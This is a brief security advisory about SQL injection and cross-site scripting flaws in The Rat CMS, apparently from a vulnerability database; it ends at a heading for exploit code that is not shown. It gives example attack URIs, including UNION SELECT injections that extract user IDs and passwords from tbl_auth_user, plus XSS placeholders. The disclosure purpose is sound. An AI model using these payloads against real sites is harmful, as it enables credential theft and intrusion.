The Rat CMS Multiple SQL Injection and Cross-Site Scripting Vulnerabilities
An attacker can exploit these issues via a browser. To exploit a cross-site scripting vulnerability, the attacker must entice a victim into following a malicious URI.

The following example URIs are available:

http://www.example.com/[trcms_path]/viewarticle.php?id=-9999/**/UNION/**/SELECT/**/user_id,user_password/**/FROM/**/tbl_auth_user--
http://www.example.com/[trcms_path]/viewarticle2.php?id=-9999/**/UNION/**/SELECT/**/user_id,user_password/**/FROM/**/tbl_auth_user--
http://www.example.com/[trcms_path]/viewarticle.php/<XSS>
http://www.example.com/[trcms_path]/viewarticle.php?id=<XSS>
http://www.example.com/[trcms_path]/viewarticle2.php?id=<XSS>

The following exploit code is available: